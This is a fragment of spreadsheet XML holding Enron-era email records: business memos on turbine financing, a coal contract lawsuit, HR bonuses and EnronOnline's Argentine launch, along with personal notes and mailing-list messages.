  <si>
    <t>Thu, 20 Apr 2000 04:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Combustion TuribneCredit Facility</t>
  </si>
  <si>
    <t>This is from SKYGEN. Jinsung_x000D_
_x000D_
_x000D_
 - skygen turbines payments.xls</t>
  </si>
  <si>
    <t>Tue, 10 Apr 2001 03:37:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Happy Tuesday</t>
  </si>
  <si>
    <t>Hello Kenny,_x000D_
_x000D_
Just a note to say Hello and that I love you .  I enjoyed yesterday _x000D_
afternoon.  And I also wanted to thank you for getting up early this morning _x000D_
and fixing my coffee and my slim fast.  That meant alot to me, more than you _x000D_
know.  Enjoy your day - I will see you after my hair appointment tonight.  _x000D_
_x000D_
_x000D_
Love and Kisses_x000D_
Sandra</t>
  </si>
  <si>
    <t>Tue, 19 Feb 2002 06:25:30 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bhastings@earthlink.net'})</t>
  </si>
  <si>
    <t>frozenset({'porchpots@yahoogroups.com', 'emca@yahoogroups.com'})</t>
  </si>
  <si>
    <t>*EMCA* EMCA newsletter clarification</t>
  </si>
  <si>
    <t xml:space="preserve">To Friends and Neighbors,_x000D_
_x000D_
Bernice Dansby called me last night to point out a_x000D_
correction/clarification of the information in the EMCA newsletter that_x000D_
we provided on the upcoming primary elections.  First, the early voting_x000D_
on February 23rd will be held at the Multi-Purpose Center on West Gray,_x000D_
just west of Waugh.  The regular Democratic voting location will be at_x000D_
Wharton Elementary School on March 12, however, she has not heard where_x000D_
the Republican primary will be held.  She told me that sometimes they_x000D_
are held in separate rooms at the school, but sometimes are in different_x000D_
locations.  So please watch the newspaper for voting locations to ensure_x000D_
that you go to the correct location for your Party's primary._x000D_
_x000D_
Cheryl Hastings_x000D_
_x000D_
_x000D_
------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;_x000D_
Get your FREE credit report with a FREE CreditCheck_x000D_
Monitoring Service trial_x000D_
http://us.click.yahoo.com/ACHqaB/bQ8CAA/ySSFAA/NoOolB/TM_x000D_
---------------------------------------------------------------------~-&gt;_x000D_
_x000D_
To unsubscribe from this group, send an email to:_x000D_
emca-unsubscribe@egroups.com_x000D_
_x000D_
 _x000D_
_x000D_
Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ _x000D_
</t>
  </si>
  <si>
    <t>Tue, 17 Oct 2000 02:47:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: ???????</t>
  </si>
  <si>
    <t xml:space="preserve"> FYI - I just recently paid for a portion of our At&amp;T bill with the_x000D_
rest of the free money in our Waterhouse account (wrote a check in the_x000D_
amount of like $2200).  The remaining balance is something like $2,500.  All_x000D_
of that amount is allocated to our monthly savings for property/school_x000D_
taxes.  I guess what you're saying is you would like to borrow from this_x000D_
savings account to make this investment.  As long as you feel confident that_x000D_
we will be able to reimburse that amount somehow to pay our taxes (should we_x000D_
not get a return on the investment), then I guess we should go for it if_x000D_
it's something you're excited about and believe is a good investment._x000D_
Naturally, I would prefer we only invest $500 because of the risk involved_x000D_
and Christmas just around the corner, but you're the one with the financial_x000D_
instincts and know-how.  Wifey_x000D_
_x000D_
-----Original Message-----_x000D_
From: Martin.Cuilla@enron.com [mailto:Martin.Cuilla@enron.com]_x000D_
Sent: Tuesday, October 17, 2000 9:25 AM_x000D_
To: zwharton@dawray.com_x000D_
Subject: ???????_x000D_
_x000D_
_x000D_
_x000D_
Hey how much of the money in our Waterhouse account is budgeted for_x000D_
expenses.  I am thinking that it would be a good investment (speculative in_x000D_
nature though) to purchase some options on Enron.  The options would expire_x000D_
in January and the potential return could vary between a loss of 100% of_x000D_
the investment to a 400%-500% return.  I think between a $500-$1,000_x000D_
investment would be wise given the nature of it._x000D_
_x000D_
MC</t>
  </si>
  <si>
    <t>Wed, 24 Oct 2001 21:36:05 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'l_jester@yahoo.com'})</t>
  </si>
  <si>
    <t>Football Trade</t>
  </si>
  <si>
    <t>I have called for a league wide vote on that obviously one-sided trade _x000D_
that went down today.  Looks like 1-5 team collaborated with a _x000D_
contending team on the trade deadline day to try a pull a fast one on the _x000D_
league.  We can't let them try to steal our money.  _x000D_
LJ_x000D_
_x000D_
Do You Yahoo!?_x000D_
Make a great connection at Yahoo! Personals.</t>
  </si>
  <si>
    <t>Fri, 15 Oct 1999 03:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Federal Legislation Memo</t>
  </si>
  <si>
    <t xml:space="preserve">Please see the attached memo from Steve Kean and Cynthia Sandherr._x000D_
</t>
  </si>
  <si>
    <t>Mon, 5 Jun 2000 19:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'todd.johnson.b@bayer.com'})</t>
  </si>
  <si>
    <t>frozenset({'martha.townsend@dakousa.com', 'conway77@vision1mm.com', 'kmoyer@carterwallace.com', 'liz@mccormick-group.com', 'murex@manado.wasantara.net.id', 'brian_shaughnessy@newcourt.com', 'jstamas@carolina.rr.com', 'brownplm@msn.com', 'ray@partyka.com', 'kmtalk@sprintmail.com', 'connell@ryder.com', 'rloeffler@c3smail.monmouth.army.mil', 'kimsking@aol.com', 'krmckee@aol.com', 'glenn.c.moyer@bellatlantic.com', 'pblj@worldnet.att.net', 'wiesnerjil@aol.com', 'pramp@dellnet.com', 'doug.ward@enron.com', 'actjackson@aol.com', 'cmraufer@west.raytheon.com', 'jeffrey_peragallo@merck.com', 'beth31@earthlink.net', 'hakimc@aetna.com', 'jrhop@dellnet.com', 'brilowery@aol.com', 'cohns3@webtv.net', 'pdtnj@aol.com', 'sfhaus@gateway.net', 'oodieg@aol.com', 'kevin.ruscitti@enron.com', 'smliebl@warwick.net', 'carol.bowen@dakousa.com', 'peggy1269@aol.com', 'bass70@aol.com', 'sdunbar@us.oracle.com'})</t>
  </si>
  <si>
    <t>Luke hits 4 months</t>
  </si>
  <si>
    <t>Hi Everyone,_x000D_
_x000D_
I know that there is a whole bunch of you on the receiving end of this EMail_x000D_
and we haven't seen or spoken to some in quite awhile but know this -- we are_x000D_
thinking of you and your families!!  Our little (big?) Luke turned 4 months_x000D_
today so I thought I would share some photos with all of you.  Although we _x000D_
have_x000D_
been guilty of not staying in touch, I hope that the attached photos will _x000D_
allow_x000D_
us to somewhat catch up with you.  It is certainly all about Luke on this end_x000D_
of the line.  He is happy, healthy and so is Mom and Dad.  Here is hoping that_x000D_
all is well on your end.  We hope to see everyone soon again some day but _x000D_
until_x000D_
then we wish everyone all the best!_x000D_
_x000D_
Love,_x000D_
_x000D_
Todd, Rena, and Luke_x000D_
_x000D_
_x000D_
_x000D_
 - Luke60300.JPG_x000D_
 - Luke4months60500.JPG</t>
  </si>
  <si>
    <t>Mon, 19 Nov 2001 09:48:38 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'stuart.staley@enron.com'})</t>
  </si>
  <si>
    <t>RE: Pro-active clarification of dry bulk 'core' status with_x000D_
 shipping trade press</t>
  </si>
  <si>
    <t xml:space="preserve">Coal is core - vessels are core to our coal business - ergo vessels are core.  Trust this is ok._x000D_
_x000D_
Thanks,_x000D_
_x000D_
George_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Staley, Stuart  _x000D_
Sent:	Monday, November  19, 2001 8:01 AM_x000D_
To:	Mcclellan, George_x000D_
Subject:	FW: Pro-active clarification of dry bulk 'core' status with shipping trade press_x000D_
Importance:	High_x000D_
_x000D_
Over to you!_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Sherriff, John  _x000D_
Sent:	19 November 2001 13:29_x000D_
To:	Staley, Stuart_x000D_
Cc:	Brown, Michael - COO London_x000D_
Subject:	FW: Pro-active clarification of dry bulk 'core' status with shipping trade press_x000D_
Importance:	High_x000D_
_x000D_
Stu_x000D_
_x000D_
I think that everyone has agreed that it is core - do you have anything confirming this from Houston?_x000D_
_x000D_
John_x000D_
 -----Original Message-----_x000D_
From: 	Gentle, Jackie  _x000D_
Sent:	19 November 2001 11:59_x000D_
To:	Sherriff, John; Brown, Michael - COO London_x000D_
Subject:	FW: Pro-active clarification of dry bulk 'core' status with shipping trade press_x000D_
Importance:	High_x000D_
_x000D_
Can you confirm the status of dry bulk freight and are you okay with this proposal?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Morrison, Andrew  _x000D_
Sent:	19 November 2001 11:56_x000D_
To:	Gentle, Jackie_x000D_
Subject:	Pro-active clarification of dry bulk 'core' status with shipping trade press_x000D_
Importance:	High_x000D_
_x000D_
_x000D_
Jackie_x000D_
_x000D_
Pierre has had it confirmed by e-mail from George McLellan that the dry bulk freight group is core business.  Pierre says this has subsequently been confirmed verbally to him by John and Michael._x000D_
_x000D_
Therefore, if you agree, the team and I would like to drop a short e-mail to our dry bulk contacts at TradeWinds and Lloyds List to confirm that both dry bulk freight (linked as it is to the coal group) has been designated as 'core business' and the whole team remains keen to serve its customers as per usual.  (We could even outline a few of our latest innovations such as offering fixed rates for ship-owners etc)._x000D_
_x000D_
Our journalist contacts for dry bulk freight are dedicated to this side of the shipping business, so I think that the risk of them making a comparison with Enron's tanker freight business which, as part of the liquid fuels group remains 'under review' is slim._x000D_
_x000D_
Looking forward to your thoughts._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Andrew_x000D_
</t>
  </si>
  <si>
    <t>Wed, 5 Jul 2000 00:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'max.yzaguirre@enron.com'})</t>
  </si>
  <si>
    <t>Various</t>
  </si>
  <si>
    <t>Max, congrats on the Decero PPA - we need to wrestle up another 100 to 200 _x000D_
MW.  This should be a priority given the profit potential of this deal as per _x000D_
Oz and Doug (+50M in 2000).  Is there an ability to let Sabine or Irvin run _x000D_
with Vitro and get your attention on this item asap.  I know that the _x000D_
Monterrey project is eating into your time.  Do we need to augment your _x000D_
resources?_x000D_
_x000D_
On a different note, the current Monterrey control budget is showing a $5.3M _x000D_
negative variance from the original control budget.  Is this accurate?  Does _x000D_
this reduce the profitability or is it absorbed by the PPA's?_x000D_
_x000D_
Regards_x000D_
Delainey</t>
  </si>
  <si>
    <t>Wed, 14 Nov 2001 12:09:33 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kevin.montagne@enron.com'})</t>
  </si>
  <si>
    <t>Beta Agreement with 3PARdata</t>
  </si>
  <si>
    <t>Stephanie, attached is the beta agreement I spoke to you about earlier today. I would like to get this through all the channels by the end of the month._x000D_
_x000D_
Thanks,_x000D_
Kevin Montagne_x000D_
x31903_x000D_
_x000D_
-----Original Message-----_x000D_
From: Milt Spiegelhauer [mailto:mspieg@swbell.net]_x000D_
Sent: Wednesday, November 14, 2001 1:44 PM_x000D_
To: Montagne, Kevin_x000D_
Cc: Jenson, Jarod; Lorio, Angelina_x000D_
Subject: Beta Agreement_x000D_
_x000D_
_x000D_
Kevin,_x000D_
_x000D_
Attached is the Beta Agreement and as we discussed, it contains the beta_x000D_
configuration and the test criteria as well as the changes that you and_x000D_
Jarod had previously requested.  Let me know who the legal contact is and we_x000D_
will work directly with them to get the agreement finalized by the end of_x000D_
November._x000D_
_x000D_
Regards,_x000D_
_x000D_
Milt_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Milt Spiegelhauer_x000D_
Senior Director, Sales_x000D_
3PARdata, Inc._x000D_
14300 Cornerstone Village Drive #321_x000D_
Houston, TX  77014_x000D_
_x000D_
milt@3pardata.com_x000D_
_x000D_
Phone: 281-583-8350_x000D_
FAX:   281-583-0380_x000D_
Cell:  281-583-4791</t>
  </si>
  <si>
    <t>Mon, 29 Oct 2001 08:48:14 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Look at this really great revieI received._x000D_
 _x000D_
http://www.brainstormsandraves.com/index.shtml_x000D_
 _x000D_
Beth Cherry_x000D_
____________x000D_
Sr. Creative Consultant_x000D_
EnFORM Technology_x000D_
713.350.1860_x000D_
 </t>
  </si>
  <si>
    <t>Tue, 10 Apr 2001 08:04:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'anne.labbe@enron.com'})</t>
  </si>
  <si>
    <t>Sevil Yamin</t>
  </si>
  <si>
    <t xml:space="preserve">Anne,_x000D_
_x000D_
Vasant sent this information to Norma. I shall fwd his message to you._x000D_
_x000D_
Vince_x000D_
---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 04/10/2001 _x000D_
03:02 PM ---------------------------_x000D_
_x000D_
_x000D_
Stinson Gibner_x000D_
04/10/2001 02:57 PM_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Sevil Yamin_x000D_
_x000D_
Vince,_x000D_
_x000D_
Do you want me to do this, or Vasant?_x000D_
_x000D_
--Stinson_x000D_
_x000D_
---------------------- Forwarded by Stinson Gibner/HOU/ECT on 04/10/2001 _x000D_
02:57 PM ---------------------------_x000D_
From: Anne Labbe/ENRON@enronXgate on 04/06/2001 09:57 AM_x000D_
To: Stinson Gibner/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Sevil Yamin_x000D_
_x000D_
Stinson,_x000D_
_x000D_
I am the new HR generalist for the research group because Norma Villarreal is _x000D_
moving to Business Analysis and Reporting.  Earlier this week, Norma and I _x000D_
met with Vince, and he said that he was going to talk to you about writing up _x000D_
a list of Sevil's projects/ accomplishments for last year and this year, so _x000D_
that we can give her a project bonus since she did not receive a bonus during _x000D_
the normal PRC time.  At your earliest convenience, will you please email me _x000D_
this list so that I can get started putting together all of the paperwork so _x000D_
that she can receive a check on April 16th._x000D_
_x000D_
If you have any questions, please feel free to contact me at 5-7809. I look _x000D_
forward to meeting you, and the rest of the group next week at Vince's staff _x000D_
meeting._x000D_
_x000D_
Thanks,_x000D_
Anne Labbe'_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 18 Apr 2001 20:42:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/19/01; HourAhead hour: 4;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t>Start Date: 4/19/01; HourAhead hour: 4;  No ancillary schedules awarded.  No _x000D_
variances detected._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final _x000D_
Schedules\2001041904.txt</t>
  </si>
  <si>
    <t>Mon, 14 Jan 2002 02:36:32 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'evillanueva@industrialinfo.com'})</t>
  </si>
  <si>
    <t>frozenset({'outages@industrialinfo.com'})</t>
  </si>
  <si>
    <t>IIR Nuclear Report</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Nuclear 7-Day Forecast for our valued Customer_x000D_
 _x000D_
Greetings,_x000D_
 _x000D_
Please find the attached 7-Day forecast Nuclear status report. If you have any questions please email to outages@industrialinfo.com._x000D_
 _x000D_
Thanks,_x000D_
 _x000D_
Industrial Information Resources, Inc._x000D_
 _x000D_
The information contained in this e-mail message is legally privileged and confidential information intended only for the use of the individual or entity named above.  You are hereby notified that any dissemination, distribution or copy of this e-mail to unauthorized entities is strictly prohibited.  If you have received this e-mail in error, please immediately notify us by telephone at 800762-3361 and delete the original message.  We apologize for any inconvenience and appreciate your cooperation. Sales: Paul Copello x3430._x000D_
 http://www.iirenergy.com/wspmgenquest.htm _x000D_
 _x000D_
 _x000D_
 - NucPDF.pdf </t>
  </si>
  <si>
    <t>Wed, 13 Sep 2000 03:25:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'pges@dynegy.com'})</t>
  </si>
  <si>
    <t>AAI Presentation:_x000D_
_x000D_
(See attached file: DRT2753.jdnmu.PPT)_x000D_
_x000D_
_x000D_
News weather ......_x000D_
_x000D_
_x000D_
Thanks for agreeing to speak Steve._x000D_
_x000D_
 - DRT2753.jdnmu.PPT_x000D_
 - South Texas Pres Aug 13 2000.pges.alledits.ppt</t>
  </si>
  <si>
    <t>Tue, 30 Oct 2001 09:26:44 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rex.rogers@enron.com'})</t>
  </si>
  <si>
    <t>FW: Sempra v. Enron</t>
  </si>
  <si>
    <t xml:space="preserve">FYI_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Brownfeld, Gail  _x000D_
Sent:	Tuesday, October 30, 2001 11:11 AM_x000D_
To:	Derrick Jr., James; Haedicke, Mark E._x000D_
Cc:	Walls Jr., Rob; Sanders, Richard B._x000D_
Subject:	Sempra v. Enron_x000D_
_x000D_
	In September I sent you all a summary of the facts at issue in the above-referenced lawsuit. Since that time, several developments have occurred.  First, the trial date was moved from October 11, 2001 to November 13, 2001.  We have no reason to believe that we will not go to trial on the 13th.  We expect the trial to last from 10 days to 2 weeks. Judge Ira Gammerman will try the case. There is no jury. _x000D_
	The second development deals with the proposed summary judgment motions mentioned in my last e-mail.  Summary judgments on liability and damages have been filed and the plaintiffs have responded.  We have filed replies to their opposition papers.  In addition, the plaintiffs filed a cross-motion for summary judgment as to liability.  We filed opposition papers to this motion.  New York practice differs somewhat from Texas practice to the extent that we have no firm date for a hearing on these motions.  Although we are attempting to get a hearing before the trial date, the judge has complete discretion as to whether to hear the parties' motions for summary judgment before the start of trial._x000D_
	The third development relates to the plaintiffs' theory of the case. It seems clear from the papers filed in response to our motions for summary judgment that the plaintiffs are fine-tuning their case to focus on the contracts' size distribution requirement arguing that the type of coal supplied by Enron, whether crushed or not, could never meet the contracts' size distribution requirement. The plaintiffs make this argument in simple terms and, when argued as such, it has some appeal. However, it is Enron's position that the contracts' language is ambiguous and the better (and much more complicated) approach advanced by the defendants is that the subject coal could and would have met the size distribution requirements. Issues of whether the contracts are installment contracts also play heavily in this analysis. _x000D_
	Fourth, since the last e-mail on this matter, we have learned that the plaintiffs are seeking $71 million in damages from Enron. This is approximately half of the amount of the contracts' damage cap. _x000D_
	Lastly, we finally received a response from the plaintiffs to the settlement proposal we made in June. The plaintiffs have offered to resolve this matter for a cash payment by Enron of $45 million. In the alternative, the plaintiffs have proposed a business alternative which is currently being investigated. Additionally, there is some discussion of mediation in the limited time remaining before trial._x000D_
	Should you have any questions about this case or should you need any further information, please call me. _x000D_
	</t>
  </si>
  <si>
    <t>Thu, 14 Sep 2000 10:22:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: October 7</t>
  </si>
  <si>
    <t xml:space="preserve">now i'm really jealous.  let me see what i can muster up for you on tuscany.  _x000D_
o, jealous am I._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Cameron Sellers &lt;cameron@perfect.com&gt; on 09/14/2000 05:06:45 PM_x000D_
To: "'jdasovic@enron.com'" &lt;jdasovic@enron.com&gt;_x000D_
cc:  _x000D_
Subject: RE: October 7_x000D_
_x000D_
_x000D_
I am meeting him in London on the 5th and we are leaving that Sunday the 8th_x000D_
for Florence.  We stay in Florence (and the Tuscany area) until the 16th._x000D_
Have you been there?  Do you know anyone who would be willing to give me_x000D_
some advice or ideas of a cool place to stay?_x000D_
_x000D_
_x000D_
Cameron Sellers_x000D_
Vice President, Business Development_x000D_
PERFECT.COM_x000D_
1860 Embarcadero Road - Suite 210_x000D_
Palo Alto, CA 94303_x000D_
cameron@perfect.com_x000D_
650.798.3366 (direct dial)_x000D_
650.269.3366 (cell)_x000D_
650.858.1095 (fax)_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  jdasovic@enron.com [mailto:jdasovic@enron.com]_x000D_
Sent: Thursday, September 14, 2000 2:37 PM_x000D_
To: cameron@perfect.com_x000D_
Subject: RE: October 7_x000D_
_x000D_
 &lt;&lt; File: JPEG File Interchange &gt;&gt;_x000D_
_x000D_
How long you going for?  I'm jealous._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Cameron Sellers &lt;cameron@perfect.com&gt; on 09/14/2000 12:20:39 PM_x000D_
_x000D_
To:   "'Nancy Sellers'" &lt;Nancy.Sellers@RobertMondavi.com&gt;, Jeff Dasovich_x000D_
      &lt;Jeff_Dasovich@enron.com&gt;, "Prentice @ Berkeley"_x000D_
      &lt;PSellers@haas.berkeley.edu&gt;, Prentice Sellers_x000D_
      &lt;PSellers@pacbell.net&gt;, Scott Laughlin &lt;scottwl@hotmail.com&gt;_x000D_
cc:   "'Eldon Sellers'" &lt;Eldon@interx.net&gt;_x000D_
Subject:  RE: October 7_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
I thought you already knew that we will already be in Italy.  Scott leaves_x000D_
on the 26(superscript: th) and I leave on October 5(superscript: th).  Oh_x000D_
well?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Cameron Sellers_x000D_
_x000D_
Vice President, Business Development_x000D_
_x000D_
PERFECT.COM_x000D_
_x000D_
1860 Embarcadero Road - Suite 210_x000D_
_x000D_
Palo Alto, CA 94303_x000D_
_x000D_
cameron@perfect.com_x000D_
_x000D_
650.798.3366 (direct dial)_x000D_
_x000D_
650.269.3366 (cell)_x000D_
_x000D_
650.858.1095 (fax)_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Nancy Sellers [mailto:Nancy.Sellers@RobertMondavi.com]_x000D_
Sent: Thursday, September 14, 2000 9:37 AM_x000D_
To: Cameron; Jeff Dasovich; Prentice @ Berkeley; Prentice Sellers; Scott_x000D_
Laughlin_x000D_
Cc: 'Eldon Sellers'_x000D_
Subject: October 7_x000D_
_x000D_
_x000D_
_x000D_
John and Kittina Powers (among others) are coming to dinner Oct 7.  Please_x000D_
let me know by the time we get back (9/23) from Mexico if any or all of you_x000D_
care to join us.  It is not a command performance, but you are most_x000D_
welcome.  I need to know to order the foie gras - there is a shortage of it_x000D_
right now - probably due to our anniversary approaching_x000D_
_x000D_
_x000D_
_x000D_
Nancy_x000D_
(707) 251-4870 (phone)_x000D_
(707) 265-5446 (fax)_x000D_
"Plus je bois, mieux je chante"_x000D_
_x000D_
_x000D_
(See attached file: image001.jpg)_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 27 Sep 2000 11:35:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'hbrown@bracepatt.com'})</t>
  </si>
  <si>
    <t>Initial Funding of enovate account</t>
  </si>
  <si>
    <t xml:space="preserve">No response required - fyi._x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 09/27/2000 06:34 _x000D_
PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Gregg Penman                           09/27/2000 03:49 PM_x000D_
	_x000D_
_x000D_
To: Mary Lynne Ruffer/HOU/ECT@ECT, Sam Round/HOU/ECT@ECT_x000D_
cc: Kay Mann/Corp/Enron@Enron _x000D_
_x000D_
Subject: Initial Funding of enovate account_x000D_
_x000D_
Hello - In order to cross one more item off of the enovate setup list, I _x000D_
would like to pursue the initial capital contribution required under the LLC _x000D_
agreement of $100,000 from each member.  Although we do not have loan _x000D_
facilities in place or final cash management protocol, I believe the initial _x000D_
funding can still take place.  If anyone has any other thoughts please let me _x000D_
know.  If not, I would like to schedule the initial funding for Friday, _x000D_
October 6th.  I believe that Mary Lynne will prepare the necessary vouchers _x000D_
and journal entries.  I am assuming that Enron MW, L.L.C., as Member, will be _x000D_
funding enovate, L.L.C.  Does ENA then fund Enron MW, L.L.C.? (Kay? Mary _x000D_
Lynne?)  _x000D_
_x000D_
As an update - Peoples' Board meets next Wednesday, Oct. 4th to approve the _x000D_
risk management policy.  Assuming approval, enovate will be free to transact _x000D_
with third parties.  Therefore, depending on payment terms, money will begin _x000D_
flowing through the enovate account.  Therefore, any loan docs and service _x000D_
agreements should be in place by the second week of October._x000D_
_x000D_
Any thoughts, please let me know._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Gregg_x000D_
</t>
  </si>
  <si>
    <t>Tue, 26 Feb 2002 08:55:53 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'michael.barone@enron.com'})</t>
  </si>
  <si>
    <t>RE: ERMS and GERMS</t>
  </si>
  <si>
    <t>Susan,_x000D_
_x000D_
I contacted Jeremy and Nilay. They did not think that the gas curve relationship data was contained in ERMS, but they referred to me Ganapathy Ramesh who is familiar with RiskTrack. I am waiting for him to return my call. _x000D_
_x000D_
Mike_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Scott, Susan M.  _x000D_
Sent:	Tuesday, February 26, 2002 10:40 AM_x000D_
To:	Bowler, Tim; Barone, Michael ; Considine, Keith; Smith, Mark Allan; Gronningsater, Eric_x000D_
Subject:	ERMS and GERMS_x000D_
_x000D_
Francis Lim _x000D_
Jeremy Wong_x000D_
Nilay Basu_x000D_
_x000D_
These individuals may now be with UBS, but they should know who to contact on the estate side.</t>
  </si>
  <si>
    <t>Thu, 19 Oct 2000 00:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'marie.heard@enron.com', 'stacy.dickson@enron.com', 'harry.collins@enron.com', 'john.viverito@enron.com', 'shari.stack@enron.com', 'david.minns@enron.com', 'alan.aronowitz@enron.com', 'jane.mcbride@enron.com', 'jeffrey.hodge@enron.com', 'robbi.rossi@enron.com', 'leslie.hansen@enron.com'})</t>
  </si>
  <si>
    <t>Argentine Customers List</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Tana Jones/HOU/ECT on 10/19/2000 07:51 AM -----_x000D_
_x000D_
	Frank L Davis_x000D_
	10/06/2000 10:58 AM_x000D_
		 _x000D_
		 To: Tom Moran/HOU/ECT@ECT, Bradley Diebner/HOU/ECT@ECT, Karen _x000D_
Lambert/HOU/ECT@ECT, Tana Jones/HOU/ECT@ECT_x000D_
		 cc: Lisa Lees/HOU/ECT@ECT_x000D_
		 Subject: Argentine Customers List_x000D_
_x000D_
Attached below is the Argentine customer list for EnronOnline.  My _x000D_
understanding is that we will launch EnronOnline in Argentina within the next _x000D_
couple of weeks.  With this in mind, I think we will have to shoot for the _x000D_
end of next week (October 13) to have customer profiles completed.  Please _x000D_
let Lisa Lees know of any conflicts or issues that arise._x000D_
_x000D_
Thanks!_x000D_
_x000D_
Frank_x000D_
_x000D_
---------------------- Forwarded by Frank L Davis/HOU/ECT on 10/06/2000 10:36 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Leonardo Pacheco@ENRON_x000D_
10/03/2000 05:19 PM_x000D_
To: Frank L Davis/HOU/ECT@ECT_x000D_
cc: Carlos Alatorre/NA/Enron@Enron _x000D_
Subject: Argentine Customers List_x000D_
_x000D_
Frank,_x000D_
_x000D_
It seems now that we are going to proceed with Argentina. Therefore, I am _x000D_
attaching the customer list. I am not sure if you already have it._x000D_
_x000D_
Thanks!_x000D_
_x000D_
Leonardo Pacheco_x000D_
_x000D_
---------------------- Forwarded by Leonardo Pacheco/Corp/Enron on 10/03/2000 _x000D_
04:16 PM ---------------------------_x000D_
_x000D_
_x000D_
Patrick Hansen_x000D_
10/03/2000 04:40 PM_x000D_
To: Leonardo Pacheco/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: Customers_x000D_
_x000D_
Esta es la lista que querias._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>frozenset({'zangeles@sempra.com'})</t>
  </si>
  <si>
    <t>frozenset({'andy.bettwy@swgas.com', 'tah@cpuc.ca.gov', 'sscott3@enron.com', 'rick.counihan@greenmountain.com', 'bdingwall@unitedgas.com', 'kbhensman@aeraenergy.com', 'ghinners@reliantenergy.com', 'vjb@cpuc.ca.gov', 'gworster@txuenergy.com', 'paulamirault@aec.ca', 'garyb@abag.ca.gov', 'trdill@westernhubs.com', 'mark.c.moench@wgp.twc.com', 'achan@ladwp.com', 'marcel@turn.org', 'epoole@adplaw.com', 'rhightower@ci.pasadena.ca.us', 'rochmanm@cubjpa.org', 'ceyap@earthlink.net', 'bcragg@gmssr.com', 'roechsler@rcgroup.com', 'inggm@sce.com', 'alan_reid@pancanadian.ca', 'napedersen@jonesday.com', 'johnj@bcjlaw.com', 'rochmanm@spurr.org', 'grant_kolling@city.palo-alto.ca.us', 'jweil@aglet.org', 'rdavis@ci.burbank.ca.us', 'alb@cpuc.ca.gov', 'm.mcnamara@ora.ca.gov', 'kmccrea@sablaw.com', 'porterdk@sce.com', 'thompson@wrightlaw.com', 'chj@aelaw.com', 'ewo@jmbm.com', 'rpelote@energy.twc.com', 'davef@abag.ca.gov', 'plg@cpuc.ca.gov', 'burkee@cts.com', '6266273191@messaging.sprintpcs.com', 'pjpowerlaw@aol.com', 'rmp@cpuc.ca.gov', 'raw@cpuc.ca.gov', 'raveen_maan@cerberus.city.palo-alto.ca.us', 'mdjoseph@adamsbroadwell.com', 'gtbl@dynegy.com', 'john.walley@swgas.com', 'joseh@lif.org', 'mbaldwin@igservice.com', 'bradylaw@pacbell.net', 'craigc@calpine.com', 'chilen@llgm.com', 'mjaske@energy.state.ca.us', 'lindseyhowdowning@dwt.com', 'eyq@cpuc.ca.gov', 'askaff@chrm.com', 'bwood@energy.state.ca.us', 'james@gmssr.com', 'kfyip@seiworldwide.com', 'rpetti@ladwp.com', 'jleslie@luce.com', 'tomb@crossborderenergy.com', 'sbs@cpuc.ca.gov', 'jcattermole@pcenergy.com', 'jtachera@energy.state.ca.us', 'ram@cpuc.ca.gov', 'skatz@sempratrading.com', 'ddame@ncpa.com', 'iep@iepa.com', 'karpjos@sf.whitecase.com', 'mday@gmssr.com', 'bho@cpuc.ca.gov', 'gsullivan@sempra.com', 'edf@cpuc.ca.gov', 'eke@aelaw.com', 'ltt@cpuc.ca.gov'})</t>
  </si>
  <si>
    <t>GIR - Notification Regarding Altra</t>
  </si>
  <si>
